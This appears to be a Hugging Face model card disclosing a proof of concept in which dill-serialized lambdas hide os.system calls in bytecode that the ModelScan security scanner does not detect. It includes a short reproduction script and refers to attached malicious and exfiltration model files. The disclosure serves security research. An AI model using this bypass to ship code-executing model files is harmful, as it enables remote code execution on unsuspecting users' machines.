manja316's picture
Upload README.md with huggingface_hub
acf13fe verified
metadata
license: mit
tags:
  - security-research
  - modelscan-bypass

ModelScan Dill Bytecode Bypass PoC

Summary

Dill serializes lambdas/closures containing arbitrary code as compiled Python bytecode objects. ModelScan only checks pickle GLOBAL opcodes for dangerous module references, but dill embeds the actual dangerous calls (os.system, subprocess, etc.) inside raw bytecode that the scanner cannot analyze.

Vulnerability

  • Format: .dill (dill serialization)
  • Scanner: modelscan 0.7.6 / 0.8.8
  • Result: "No issues found"
  • Impact: Full RCE — any Python code can be embedded in a lambda/closure

Root Cause

Dill uses dill._dill._create_function and dill._dill._create_code to reconstruct functions from serialized bytecode. These modules are not in modelscan's blocklist. More critically, the ACTUAL dangerous code (os.system, subprocess.call, etc.) is embedded as compiled Python bytecode bytes, not as pickle GLOBAL references. ModelScan's approach of checking module names in pickle opcodes fundamentally cannot detect code hidden in bytecode objects.

Reproduction

import dill, os

# Create lambda with RCE
evil = lambda: os.system('echo PWNED')
dill.dump(evil, open('evil.dill', 'wb'))

# Scan — "No issues found"
# modelscan scan -p evil.dill

# Load — RCE
loaded = dill.load(open('evil.dill', 'rb'))
loaded()  # prints PWNED

Files

  • malicious_model.dill — Lambda calling os.system
  • exfiltration_model.dill — Lambda with data exfiltration payload